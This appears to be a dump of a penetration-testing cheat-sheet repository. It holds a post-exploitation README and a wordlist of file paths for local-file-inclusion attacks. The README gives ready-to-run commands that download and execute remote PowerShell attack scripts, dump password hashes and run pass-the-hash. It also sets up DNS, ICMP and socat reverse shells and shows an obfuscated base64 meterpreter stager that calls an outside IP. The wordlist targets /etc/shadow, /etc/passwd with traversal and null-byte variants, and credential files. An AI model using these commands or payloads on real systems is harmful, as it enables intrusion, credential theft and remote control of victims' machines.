513 | 514 | ![image](https://user-images.githubusercontent.com/7115563/34455649-dcc941ea-ed83-11e7-9428-a702f254e807.png) 515 | 516 | Connect to MSSQL Database 517 | 518 |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/michaellwest/PowerShell-Modules/master/CorpApps/Invoke-SqlCommand.ps1')
519 | 
520 | Invoke-SqlCommand -Server 172.11.14.89 -Database master -Username sa -Password  -Query "exec sp_databases" 
521 | 522 | Port Scanning 523 | 524 |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1')
525 | 
526 | Invoke-Portscan -Hosts [ip] -TopPorts 50
527 | 528 | ![image](https://user-images.githubusercontent.com/7115563/34455679-6e630230-ed84-11e7-995e-2eea1a6fc8dc.png) 529 | 530 | 531 | View Domain Admins 532 | 533 |
 net groups /domain "Domain Admins"
534 | 535 | ![image](https://user-images.githubusercontent.com/7115563/34455690-9e648d78-ed84-11e7-9a84-9b335530a31e.png) 536 | 537 | View Domain Controllers 538 | 539 |
nltest /dclist: 
540 | 541 | ![image](https://user-images.githubusercontent.com/7115563/34455698-d1504074-ed84-11e7-85ad-c4bb196c9d44.png) 542 | 543 | 544 | 545 | Get Hashes 546 | 547 |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes
548 | 549 | ![image](https://user-images.githubusercontent.com/7115563/34455769-66cb31bc-ed86-11e7-846e-090647d8e32f.png) 550 | 551 | 552 | Check Pass The Hash with multiple servers 553 | 554 |
$hosts = @("SVDC1.LAZULI.CORP","SVFILES.LAZULI.CORP","SVHOST1.LAZULI.CORP","SVHOST2.LAZULI.CORP","SVFILES2.LAZULI.CORP")
555 | 
556 | foreach ($h in $hosts){ Invoke-WMIExec -Target $h -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "hostname" -Verbose }
557 | 
558 | 
559 | 560 | ![image](https://user-images.githubusercontent.com/7115563/34455798-0bdc77ec-ed87-11e7-9504-6b9ec6fc2a8d.png) 561 | 562 | Run web_delivery with other identity 563 | 564 |
 runas-cabesha-webdelivery -url [url_webdelivery] -user [url] -pass [pass] 
565 | 566 | ![cabesha](https://user-images.githubusercontent.com/7115563/42811084-e286eb5a-89b9-11e8-8ec8-b0b8c3980774.jpg) 567 | 568 | 569 | References: https://www.hacklikeapornstar.com/ 570 | 571 | 572 | 573 |

Reverse Shells

574 | 575 |

Reverse DNS Shell with dnscat powershell

576 | 577 | Server 578 | 579 |
ruby dnscat2.rb -e open --no-cache tunnel.domain.com
580 | 581 | 582 | Client 583 | 584 |
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain tunnel.domain.com -DNSServer 8.8.4.4 
585 | 586 | 587 | ![dns](https://user-images.githubusercontent.com/7115563/35040679-5a155bfa-fb82-11e7-98ec-ba015e3ad69c.png) 588 | 589 | Reference: https://github.com/lukebaggett/dnscat2-powershell 590 | 591 | 592 |

Reverse ICMP shell

593 | 594 | Server 595 | 596 |
 python icmpsh_m.py [IP atacante] [IP victima] 
597 | 598 | Client 599 | 600 |
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress [IP atacante]
601 | 602 | ![icmpreverseshell](https://user-images.githubusercontent.com/7115563/35213289-6ac51b00-ff5d-11e7-9b66-766af2aaf92e.png) 603 | 604 | Reference: https://esgeeks.com/icmpsh-shell-reverse-con-icmp/ 605 | 606 | 607 |

Reverse HTTP Shell through Proxy

608 | 609 |
use payload/python/meterpreter/reverse_http
610 | 611 | ![proxy2](https://user-images.githubusercontent.com/7115563/33836652-3d9c9624-de8a-11e7-9869-e18c5a28ebd7.png) 612 | 613 | 614 | ```python -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnUHJveHlIYW5kbGVyJ10pCmhzPVtdCmhzLmFwcGVuZCh1bC5Qcm94eUhhbmRsZXIoeydodHRwJzonaHR0cDovLzE5Mi4xNjguMTA3LjIzMjo4MDgwJ30pKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cDovLzE3OC42Mi41OC4zNTo4MC9qOTkzQScpLnJlYWQoKSkK')))"``` 615 | 616 | Finally we set up the handler: 617 | 618 | ![proxy3](https://user-images.githubusercontent.com/7115563/33836552-fd3204ac-de89-11e7-940c-71c8ab321bf7.png) 619 | 620 | 621 |

Miscellaneous

622 | 623 |

Interactive Reverse Shell

624 | 625 | Method 1 626 | 627 | Attacker: 628 | 629 | ```socat file:`tty`,raw,echo=0 TCP-L:4444``` 630 | 631 | Victim: 632 | 633 | ```wget -q http://10.10.14.16/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.16:4444``` 634 | 635 | Socat Binary: https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat 636 | 637 | Method 2 638 | 639 | In reverse shell 640 | 641 |
642 | python -c 'import pty; pty.spawn("/bin/bash")'
643 | Ctrl-Z
644 | 
645 | 646 | In kali 647 | 648 |
649 | echo $TERM
650 | stty -a
651 | stty raw -echo
652 | fg
653 | 
654 | 655 | In reverse shell 656 | 657 |
658 | reset
659 | export SHELL=bash
660 | export TERM=xterm-256color
661 | stty rows <rows> columns <columns>
662 | bash
663 | 
664 | 665 |

Windows File Transfer

666 | 667 | bitsadmin 668 | 669 | `bitsadmin /transfer debjob /download /priority normal http:///shell.php c:\xampp\htdocs\shell.php` 670 | 671 | cscript wget.vbs (code on the repo) 672 | 673 | `cscript wget.vbs http:///test.txt test.txt` 674 | 675 | powershell 676 | 677 | `powershell -c "(new-object System.Net.WebClient).Downloadfile('http:///exploit.exe', 'C:\Windows\temp\exploit.txt')"` 678 | 679 | ftp 680 | 681 | client: 682 | 683 |
684 | echo open [ip] [port] > ftpscript.txt
685 | echo anonymous>> ftpscript.txt
686 | echo PASS >> ftpscript.txt
687 | echo bin >> ftpscript.txt
688 | echo get meter.exe>> ftpscript.txt
689 | echo quit >> ftpscript.txt
690 | ftp -s:ftpscript.txt
691 | 
692 | 693 | server: 694 | 695 | python -m pyftpdlib --port=2121 --write 696 | 697 | wget.exe 698 | 699 | Upload to vulnerable server from kali: ` /usr/share/windows-binaries/wget.exe` 700 | 701 | `wget.exe http:///file file` 702 | 703 | certutil 704 | 705 | `certutil -urlcache -split -f https:///file.txt file.txt` 706 | 707 |

Bypass VPN routing restrictions

708 | 709 |
openconnect vpnXXX02.XXXX.com -u XX -s 'vpn-slice XXX.46.0.0/16 hostname3 mantis=XXX.41.2XX.68'
710 | 711 | ![vpn1](https://user-images.githubusercontent.com/7115563/41146909-30e484de-6b05-11e8-82fb-acfc17a722a2.png) 712 | 713 | Reference: https://github.com/dlenski/vpn-slice 714 | 715 | 716 | 717 | -------------------------------------------------------------------------------- /lfiunix.txt: -------------------------------------------------------------------------------- 1 | .ssh/auhtorized_keys 2 | /.ssh/authorized_keys 3 | /var/mail/www-data 4 | /var/log/www-data 5 | \apache2\log\access_log 6 | \apache2\log\access.log 7 | \apache2\log\error_log 8 | \apache2\log\error.log 9 | /apache2/logs/access.log 10 | \apache2\logs\access_log 11 | \apache2\logs\access.log 12 | /apache2/logs/access.log%00 13 | /apache2/logs/error.log 14 | \apache2\logs\error_log 15 | \apache2\logs\error.log 16 | /apache2/logs/error.log%00 17 | /apache/conf/httpd.conf 18 | \apache\log\access_log 19 | \apache\log\access.log 20 | \apache\log\error_log 21 | \apache\log\error.log 22 | /apache/logs/access.log 23 | /apache/logs/access.log 24 | \apache\logs\access_log 25 | \apache\logs\access.log 26 | /apache/logs/access.log%00 27 | /apache/logs/error.log 28 | /apache/logs/error.log 29 | \apache\logs\error_log 30 | \apache\logs\error.log 31 | /apache/logs/error.log%00 32 | /apache/php/php.ini 33 | /apache\php\php.ini 34 | /apache\php\php.ini%00 35 | /app/etc/local.xml 36 | /.aptitude/config 37 | .aptitude/config 38 | /.bash_config 39 | .bash_config 40 | /.bash_history 41 | .bash_history 42 | /.bash_logout 43 | .bash_logout 44 | /.bashrc 45 | .bashrc 46 | /bin/php.ini 47 | /bin/php.ini%00 48 | /boot/grub/grub.cfg 49 | /boot/grub/menu.lst 50 | /boot.ini 51 | /.cache/notify-osd.log 52 | .cache/notify-osd.log 53 | c:\apache\php\php.ini 54 | C:\apache\php\php.ini 55 | C:\boot.ini 56 | c:\home2\bin\stable\apache\php.ini 57 | C:\home2\bin\stable\apache\php.ini 58 | c:\home\bin\stable\apache\php.ini 59 | C:\home\bin\stable\apache\php.ini 60 | C:\MySQL\data\hostname.err 61 | C:\MySQL\data\mysql-bin.log 
62 | C:\MySQL\data\mysql.err 63 | C:\MySQL\data\mysql.log 64 | C:\MySQL\my.cnf 65 | C:\MySQL\my.ini 66 | c:\NetServer\bin\stable\apache\php.ini 67 | /config/app.php 68 | /config/custom.php 69 | /config/database.php 70 | /config_dev.yml 71 | /config.inc.php 72 | /.config/odesk/odesk 73 | .config/oDesk/oDesk Team.conf 74 | /config.php 75 | /config_prod.yml 76 | /config_test.yml 77 | /configuration.php 78 | /config.yml 79 | c:\php4\php.ini 80 | C:\php4\php.ini 81 | C:\php4\sessions\ 82 | c:\php5\php.ini 83 | C:\php5\php.ini 84 | C:\php5\sessions\ 85 | c:\php\php.ini 86 | c:\PHP\php.ini 87 | C:\php\php.ini 88 | C:\php\sessions\ 89 | C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf 90 | C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf 91 | C:\ProgramFiles\ApacheGroup\Apache\logs\access.log 92 | C:\ProgramFiles\ApacheGroup\Apache\logs\error.log 93 | C:\ProgramFiles\MySQL\data\hostname.err 94 | C:\ProgramFiles\MySQL\data\mysql-bin.log 95 | C:\ProgramFiles\MySQL\data\mysql.err 96 | C:\ProgramFiles\MySQL\data\mysql.log 97 | C:\ProgramFiles\MySQL\my.cnf 98 | C:\ProgramFiles\MySQL\my.ini 99 | C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err 100 | C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log 101 | C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err 102 | C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log 103 | C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf 104 | C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini 105 | C:\ProgramFiles\xampp\apache\conf\httpd.conf 106 | /.cshrc 107 | .cshrc 108 | c:\WINDOWS\php.ini 109 | C:\WINDOWS\php.ini 110 | C:\WINDOWS\Repair\SAM 111 | C:\WINDOWS\TEMP\ 112 | C:\WINDOWS\win.ini 113 | c:\WINNT\php.ini 114 | C:\WINNT\php.ini 115 | C:\WINNT\win.ini 116 | c:\xampp\apache\bin\php.ini 117 | C:\xampp\apache\bin\php.ini 118 | etc%2fpasswd 119 | etc%2fpasswd%00 120 | etc%5cpasswd 121 | etc%5cpasswd%00 122 | /etc/adduser.conf 123 | /etc/alias 124 | /etc/apache22/conf/httpd.conf 125 | /etc/apache22/httpd.conf 126 | /etc/apache2/apache2.conf 
127 | /etc/apache2/apache.conf 128 | /etc/apache2.conf 129 | /etc/apache2/conf.d/charset 130 | /etc/apache2/conf.d/phpmyadmin.conf 131 | /etc/apache2/conf.d/security 132 | /etc/apache2/conf/httpd.conf 133 | /etc/apache2/conf/httpd.conf%00 134 | /etc/apache2/default-server.conf 135 | /etc/apache2/envvars 136 | /etc/apache2/.htpasswd 137 | /etc/apache2/httpd2.conf 138 | /etc/apache2/httpd.conf 139 | /etc/apache2/httpd.conf%00 140 | /etc/apache2/mods-available/autoindex.conf 141 | /etc/apache2/mods-available/deflate.conf 142 | /etc/apache2/mods-available/dir.conf 143 | /etc/apache2/mods-available/mem_cache.conf 144 | /etc/apache2/mods-available/mime.conf 145 | /etc/apache2/mods-available/proxy.conf 146 | /etc/apache2/mods-available/setenvif.conf 147 | /etc/apache2/mods-available/ssl.conf 148 | /etc/apache2/mods-enabled/alias.conf 149 | /etc/apache2/mods-enabled/deflate.conf 150 | /etc/apache2/mods-enabled/dir.conf 151 | /etc/apache2/mods-enabled/mime.conf 152 | /etc/apache2/mods-enabled/negotiation.conf 153 | /etc/apache2/mods-enabled/php5.conf 154 | /etc/apache2/mods-enabled/status.conf 155 | /etc/apache2/ports.conf 156 | /etc/apache2/sites-available/default 157 | /etc/apache2/sites-available/default-ssl 158 | /etc/apache2/sites-available/default-ssl.conf 159 | /etc/apache2/sites-enabled/000-default 160 | /etc/apache2/sites-enabled/000-default.conf 161 | /etc/apache2/sites-enabled/default 162 | /etc/apache2/ssl-global.conf 163 | /etc/apache2/vhosts.d/00_default_vhost.conf 164 | /etc/apache2/vhosts.d/default_vhost.include 165 | /etc/apache/access.conf 166 | /etc/apache/apache.conf 167 | /etc/apache/conf/httpd.conf 168 | /etc/apache/conf/httpd.conf%00 169 | /etc/apache/default-server.conf 170 | /etc/apache/.htpasswd 171 | /etc/apache/httpd.conf 172 | /etc/apt/apt.conf 173 | /etc/avahi/avahi-daemon.conf 174 | /etc/bash.bashrc 175 | /etc/bash_completion.d/debconf 176 | /etc/bluetooth/input.conf 177 | /etc/bluetooth/main.conf 178 | /etc/bluetooth/network.conf 179 | 
/etc/bluetooth/rfcomm.conf 180 | etc%c0%afpasswd 181 | etc%c0%afpasswd%00 182 | /etc/ca-certificates.conf 183 | /etc/ca-certificates.conf.dpkg-old 184 | /etc/casper.conf 185 | /etc/chkrootkit.conf 186 | /etc/chrootusers 187 | /etc/chrootUsers 188 | /etc/chrootUsers%00 189 | /etc/clamav/clamd.conf 190 | /etc/clamav/freshclam.conf 191 | /etc/crontab 192 | /etc/crypttab 193 | /etc/cups/acroread.conf 194 | /etc/cups/cupsd.conf 195 | /etc/cups/cupsd.conf.default 196 | /etc/cups/pdftops.conf 197 | /etc/cups/printers.conf 198 | /etc/cvs-cron.conf 199 | /etc/cvs-pserver.conf 200 | /etc/debconf.conf 201 | /etc/debian_version 202 | /etc/default/grub 203 | /etc/deluser.conf 204 | /etc/dhcp3/dhclient.conf 205 | /etc/dhcp3/dhcpd.conf 206 | /etc/dhcp/dhclient.conf 207 | /etc/dns2tcpd.conf 208 | /etc/e2fsck.conf 209 | /etc/esound/esd.conf 210 | /etc/etter.conf 211 | /etc/exports 212 | /etc/fedora-release 213 | /etc/firewall.rules 214 | /etc/foremost.conf 215 | /etc/fstab 216 | /etc/ftpchroot 217 | /etc/ftpchroot%00 218 | /etc/ftphosts 219 | /etc/ftphosts%00 220 | /etc/ftpusers 221 | /etc/fuse.conf 222 | /etc/group 223 | /etc/group- 224 | /etc/group%00 225 | /etc/hdparm.conf 226 | /etc/host.conf 227 | /etc/hostname 228 | /etc/hosts 229 | /etc/hosts.allow 230 | /etc/hosts.deny 231 | /etc/http/conf/httpd.conf 232 | /etc/http/conf/httpd.conf%00 233 | /etc/httpd/apache2.conf 234 | /etc/httpd/apache.conf 235 | /etc/httpd/conf 236 | /etc/httpd.conf 237 | /etc/httpd.conf%00 238 | /etc/httpd/conf/apache2.conf 239 | /etc/httpd/conf/apache.conf 240 | /etc/httpd/conf.d 241 | /etc/httpd/conf.d/php.conf 242 | /etc/httpd/conf.d/squirrelmail.conf 243 | /etc/httpd/conf/httpd.conf 244 | /etc/httpd/conf/httpd.conf%00 245 | /etc/httpd/extra/httpd-ssl.conf 246 | /etc/httpd/httpd.conf 247 | /etc/httpd/httpd.conf%00 248 | /etc/httpd/logs/acces_log 249 | /etc/httpd/logs/acces_log 250 | /etc/httpd/logs/acces.log 251 | /etc/httpd/logs/acces.log 252 | /etc/httpd/logs/acces_log%00 253 | 
/etc/httpd/logs/acces.log%00 254 | /etc/httpd/logs/access_log 255 | /etc/httpd/logs/access.log 256 | /etc/httpd/logs/error_log 257 | /etc/httpd/logs/error_log 258 | /etc/httpd/logs/error.log 259 | /etc/httpd/logs/error.log 260 | /etc/httpd/logs/error_log%00 261 | /etc/httpd/logs/error.log%00 262 | /etc/httpd/mod_php.conf 263 | /etc/httpd/php.ini 264 | /etc/httpd/php.ini%00 265 | /etc/http/httpd.conf 266 | /etc/http/httpd.conf%00 267 | /etc/inetd.conf 268 | /etc/init.d 269 | /etc/inittab 270 | /etc/ipfw.conf 271 | /etc/ipfw.rules 272 | /etc/issue 273 | /etc/issue.net 274 | /etc/kbd/config 275 | /etc/kernel-img.conf 276 | /etc/kernel-pkg.conf 277 | /etc/ldap/ldap.conf 278 | /etc/ld.so.conf 279 | /etc/lighttpd/lighthttpd.conf 280 | /etc/login.defs 281 | /etc/logrotate.conf 282 | /etc/logrotate.d/ftp 283 | /etc/logrotate.d/ftp%00 284 | /etc/logrotate.d/proftpd 285 | /etc/logrotate.d/proftpd%00 286 | /etc/logrotate.d/vsftpd.log 287 | /etc/logrotate.d/vsftpd.log%00 288 | /etc/ltrace.conf 289 | /etc/mail/sendmail.conf 290 | /etc/mandrake-release 291 | /etc/manpath.config 292 | /etc/master.passwd 293 | /etc/miredo.conf 294 | /etc/miredo/miredo.conf 295 | /etc/miredo/miredo-server.conf 296 | /etc/miredo-server.conf 297 | /etc/modprobe.d/vmware-tools.conf 298 | /etc/modules 299 | /etc/mono/1.0/machine.config 300 | /etc/mono/2.0/machine.config 301 | /etc/mono/2.0/web.config 302 | /etc/mono/config 303 | /etc/motd 304 | /etc/mtab 305 | /etc/mtools.conf 306 | /etc/muddleftpd.com 307 | /etc/muddleftpd/muddleftpd.conf 308 | /etc/muddleftpd/muddleftpd.passwd 309 | /etc/muddleftpd/mudlog 310 | /etc/muddleftpd/mudlogd.conf 311 | /etc/muddleftpd/passwd 312 | /etc/my.cnf 313 | /etc/my.cnf%00 314 | /etc/mysql/conf.d/old_passwords.cnf 315 | /etc/mysql/my.cnf 316 | /etc/mysql/my.cnf%00 317 | /etc/networks 318 | /etc/newsyslog.conf 319 | /etc/nginx.conf 320 | /etc/nginx/nginx.conf 321 | /etc/nginx/sites-available/default 322 | /etc/nginx/sites-enabled/default 323 | /etc/openldap/ldap.conf 
324 | /etc/os-release 325 | /etc/osxhttpd/osxhttpd.conf 326 | /etc/pam.conf 327 | /etc/pam.d/proftpd 328 | /..\..\\..\..\\..\..\\..\..\\\/etc/passwd 329 | /etc/passwd 330 | /etc/passwd~ 331 | /etc/passwd- 332 | /etc/passwd%00 333 | etc/passwd%00 334 | /etc/password.master 335 | /etc/php4.4/fcgi/php.ini 336 | /etc/php4.4/fcgi/php.ini%00 337 | /etc/php4/apache2/php.ini 338 | /etc/php4/apache2/php.ini%00 339 | /etc/php4/apache/php.ini 340 | /etc/php4/apache/php.ini%00 341 | /etc/php4/cgi/php.ini 342 | /etc/php4/cgi/php.ini%00 343 | /etc/php5/apache2/php.ini 344 | /etc/php5/apache2/php.ini%00 345 | /etc/php5/apache/php.ini 346 | /etc/php5/apache/php.ini%00 347 | /etc/php5/cgi/php.ini 348 | /etc/php5/cgi/php.ini%00 349 | /etc/php/apache2/php.ini 350 | /etc/php/apache2/php.ini%00 351 | /etc/php/apache/php.ini 352 | /etc/php/apache/php.ini%00 353 | /etc/php/cgi/php.ini 354 | /etc/php/cgi/php.ini%00 355 | /etc/php.ini 356 | /etc/php.ini%00 357 | /etc/phpmyadmin/config.inc.php 358 | /etc/php/php4/php.ini 359 | /etc/php/php4/php.ini%00 360 | /etc/php/php.ini 361 | /etc/php/php.ini%00 362 | /etc/postgresql/pg_hba.conf 363 | /etc/postgresql/postgresql.conf 364 | /etc/profile 365 | /etc/proftp.conf 366 | /etc/proftp.conf%00 367 | /etc/proftpd/modules.conf 368 | /etc/proftpd/modules.conf%00 369 | /etc/protpd/proftpd.conf 370 | /etc/protpd/proftpd.conf%00 371 | /etc/pulse/client.conf 372 | /etc/pure-ftpd.conf 373 | /etc/pure-ftpd.conf%00 374 | /etc/pureftpd.passwd 375 | /etc/pureftpd.passwd%00 376 | /etc/pureftpd.pdb 377 | /etc/pureftpd.pdb%00 378 | /etc/pure-ftpd/pure-ftpd.conf 379 | /etc/pure-ftpd/pure-ftpd.conf%00 380 | /etc/pure-ftpd/pure-ftpd.pdb 381 | /etc/pure-ftpd/pureftpd.pdb 382 | /etc/pure-ftpd/pure-ftpd.pdb%00 383 | /etc/pure-ftpd/pureftpd.pdb%00 384 | /etc/rc.conf 385 | /etc/rc.d/rc.httpd 386 | /etc/redhat-release 387 | /etc/release 388 | /etc/resolv.conf 389 | /etc/resolvconf/update-libc.d/sendmail 390 | /etc/samba/dhcp.conf 391 | /etc/samba/netlogon 392 | 
/etc/samba/private/smbpasswd 393 | /etc/samba/samba.conf 394 | /etc/samba/smb.conf 395 | /etc/samba/smb.conf.user 396 | /etc/samba/smbpasswd 397 | /etc/samba/smbusers 398 | /etc/security/access.conf 399 | /etc/security/environ 400 | /etc/security/environ%00 401 | /etc/security/failedlogin 402 | /etc/security/group 403 | /etc/security/group%00 404 | /etc/security/group.conf 405 | /etc/security/lastlog 406 | /etc/security/limits 407 | /etc/security/limits%00 408 | /etc/security/limits.conf 409 | /etc/security/namespace.conf 410 | /etc/security/opasswd 411 | /etc/security/pam_env.conf 412 | /etc/security/passwd 413 | /etc/security/passwd%00 414 | /etc/security/sepermit.conf 415 | /etc/security/time.conf 416 | /etc/security/user 417 | /etc/security/user%00 418 | /etc/sensors3.conf 419 | /etc/sensors.conf 420 | /etc/shadow 421 | /etc/shadow~ 422 | /etc/shadow- 423 | /etc/shadow%00 424 | /etc/slackware-release 425 | /etc/smb.conf 426 | /etc/smbpasswd 427 | /etc/smi.conf 428 | /etc/squirrelmail/apache.conf 429 | /etc/squirrelmail/config/config.php 430 | /etc/squirrelmail/config_default.php 431 | /etc/squirrelmail/config_local.php 432 | /etc/squirrelmail/config.php 433 | /etc/squirrelmail/default_pref 434 | /etc/squirrelmail/filters_setup.php 435 | /etc/squirrelmail/index.php 436 | /etc/squirrelmail/sqspell_config.php 437 | /etc/ssh/sshd_config 438 | /etc/sso/sso_config.ini 439 | /etc/stunnel/stunnel.conf 440 | /etc/subversion/config 441 | /etc/sudoers 442 | /etc/suse-release 443 | /etc/sw-cp-server/applications.d/00-sso-cpserver.conf 444 | /etc/sw-cp-server/applications.d/plesk.conf 445 | /etc/sysconfig/network-scripts/ifcfg-eth0 446 | /etc/sysctl.conf 447 | /etc/sysctl.d/10-console-messages.conf 448 | /etc/sysctl.d/10-network-security.conf 449 | /etc/sysctl.d/10-process-security.conf 450 | /etc/sysctl.d/wine.sysctl.conf 451 | /etc/syslog.conf 452 | /etc/timezone 453 | /etc/tinyproxy/tinyproxy.conf 454 | /etc/tomcat6/tomcat-users.xml 455 | /etc/tomcat7/tomcat-users.xml 
456 | /etc/tomcat8/tomcat-users.xml 457 | /etc/tor/tor-tsocks.conf 458 | /etc/tsocks.conf 459 | /etc/updatedb.conf 460 | /etc/updatedb.conf.beforevmwaretoolsinstall 461 | /etc/utmp 462 | /etc/vhcs2/proftpd/proftpd.conf 463 | /etc/vhcs2/proftpd/proftpd.conf%00 464 | /etc/vmware-tools/config 465 | /etc/vmware-tools/tpvmlp.conf 466 | /etc/vmware-tools/vmware-tools-libraries.conf 467 | /etc/vsftpd.chroot_list 468 | /etc/vsftpd.chroot_list%00 469 | /etc/vsftpd.conf 470 | /etc/vsftpd.conf%00 471 | /etc/vsftpd/vsftpd.conf 472 | /etc/vsftpd/vsftpd.conf%00 473 | /etc/webmin/miniserv.conf 474 | /etc/webmin/miniserv.users 475 | /etc/wicd/dhclient.conf.template.default 476 | /etc/wicd/manager-settings.conf 477 | /etc/wicd/wired-settings.conf 478 | /etc/wicd/wireless-settings.conf 479 | /etc/wu-ftpd/ftpaccess 480 | /etc/wu-ftpd/ftpaccess%00 481 | /etc/wu-ftpd/ftphosts 482 | /etc/wu-ftpd/ftphosts%00 483 | /etc/wu-ftpd/ftpusers 484 | /etc/wu-ftpd/ftpusers%00 485 | /etc/x11/xorg.conf 486 | /etc/x11/xorg.conf.beforevmwaretoolsinstall 487 | /etc/x11/xorg.conf.orig 488 | /etc/x11/xorg.conf-vesa 489 | /etc/x11/xorg.conf-vmware 490 | /.gitconfig 491 | .gitconfig 492 | .history 493 | /home2/bin/stable/apache/php.ini 494 | /home2\bin\stable\apache\php.ini 495 | /home2\bin\stable\apache\php.ini%00 496 | /home/bin/stable/apache/php.ini 497 | /home\bin\stable\apache\php.ini 498 | /home\bin\stable\apache\php.ini%00 499 | /home/postgres/data/pg_hba.conf 500 | /home/postgres/data/pg_ident.conf 501 | /home/postgres/data/pg_version 502 | /home/postgres/data/postgresql.conf 503 | /home/user/lighttpd/lighttpd.conf 504 | /.hplip/hplip.conf 505 | .hplip/hplip.conf 506 | /http/httpd.conf 507 | /inc/config.php 508 | /includes/config.php 509 | /includes/configure.php 510 | /[jboss]/server/default/conf/jboss-minimal.xml 511 | /[jboss]/server/default/conf/jboss-service.xml 512 | /[jboss]/server/default/conf/jndi.properties 513 | /[jboss]/server/default/conf/log4j.xml 514 | 
/[jboss]/server/default/conf/login-config.xml 515 | /[jboss]/server/default/conf/server.log.properties 516 | /[jboss]/server/default/conf/standardjaws.xml 517 | /[jboss]/server/default/conf/standardjboss.xml 518 | /[jboss]/server/default/deploy/jboss-logging.xml 519 | /[jboss]/server/default/log/boot.log 520 | /[jboss]/server/default/log/server.log 521 | /.ksh_history 522 | .ksh_history 523 | /library/webserver/documents/default.htm 524 | /library/webserver/documents/default.html 525 | /library/webserver/documents/default.php 526 | /library/webserver/documents/.htaccess 527 | /library/webserver/documents/index.htm 528 | /library/webserver/documents/index.html 529 | /library/webserver/documents/index.php 530 | /LocalSettings.php 531 | \log\access_log 532 | \log\access.log 533 | \log\error_log 534 | \log\error.log 535 | \log\httpd\access_log 536 | \log\httpd\error_log 537 | /logs/access_log 538 | /logs/access.log 539 | \logs\access_log 540 | \logs\access.log 541 | /logs/access.log%00 542 | /logs/error_log 543 | /logs/error.log 544 | \logs\error_log 545 | \logs\error.log 546 | /logs/error.log%00 547 | \logs\httpd\access_log 548 | \logs\httpd\error_log 549 | /logs/pure-ftpd.log 550 | /logs/pure-ftpd.log%00 551 | /logs/security_debug_log 552 | /logs/security_log 553 | /.my.cnf 554 | .my.cnf 555 | /mysql/bin/my.ini 556 | \mysql\bin\my.ini 557 | /mysql/data/{host}.err 558 | /mysql/data/mysql-bin.index 559 | /mysql/data/mysql-bin.log 560 | /mysql/data/mysql.err 561 | /mysql/data/mysql.log 562 | /.mysql_history 563 | .mysql_history 564 | /mysql/my.cnf 565 | /mysql/my.ini 566 | .mysql_secret 567 | /.nano_history 568 | .nano_history 569 | /netserver/bin/stable/apache/php.ini 570 | /NetServer\bin\stable\apache\php.ini 571 | /NetServer\bin\stable\apache\php.ini%00 572 | /opt/apache22/conf/httpd.conf 573 | /opt/apache2/apache2.conf 574 | /opt/apache2/apache.conf 575 | /opt/apache2/conf/apache2.conf 576 | /opt/apache2/conf/apache.conf 577 | /opt/apache2/conf/httpd.conf 578 | 
/opt/apache2/conf/httpd.conf%00 579 | /opt/apache/apache2.conf 580 | /opt/apache/apache.conf 581 | /opt/apache/conf/apache2.conf 582 | /opt/apache/conf/apache.conf 583 | /opt/apache/conf/httpd.conf 584 | /opt/apache/conf/httpd.conf%00 585 | /opt/httpd/apache2.conf 586 | /opt/httpd/apache.conf 587 | /opt/httpd/conf/apache2.conf 588 | /opt/httpd/conf/apache.conf 589 | /opt/[jboss]/server/default/conf/jboss-minimal.xml 590 | /opt/[jboss]/server/default/conf/jboss-service.xml 591 | /opt/[jboss]/server/default/conf/jndi.properties 592 | /opt/[jboss]/server/default/conf/log4j.xml 593 | /opt/[jboss]/server/default/conf/login-config.xml 594 | /opt/[jboss]/server/default/conf/server.log.properties 595 | /opt/[jboss]/server/default/conf/standardjaws.xml 596 | /opt/[jboss]/server/default/conf/standardjboss.xml 597 | /opt/[jboss]/server/default/deploy/jboss-logging.xml 598 | /opt/[jboss]/server/default/log/boot.log 599 | /opt/[jboss]/server/default/log/server.log 600 | /opt/lampp/etc/httpd.conf 601 | /opt/lampp/logs/access_log 602 | /opt/lampp/logs/access.log 603 | /opt/lampp/logs/access_log%00 604 | /opt/lampp/logs/access.log%00 605 | /opt/lampp/logs/error_log 606 | /opt/lampp/logs/error.log 607 | /opt/lampp/logs/error_log%00 608 | /opt/lampp/logs/error.log%00 609 | /opt/lsws/conf/httpd_conf.xml 610 | /opt/lsws/logs/access.log 611 | /opt/lsws/logs/error.log 612 | /opt/tomcat/logs/catalina.err 613 | /opt/tomcat/logs/catalina.out 614 | /opt/xampp/etc/php.ini 615 | /opt/xampp/etc/php.ini%00 616 | /opt/xampp/logs/access_log 617 | /opt/xampp/logs/access.log 618 | \opt\xampp\logs\access_log 619 | \opt\xampp\logs\access.log 620 | /opt/xampp/logs/access_log%00 621 | /opt/xampp/logs/access.log%00 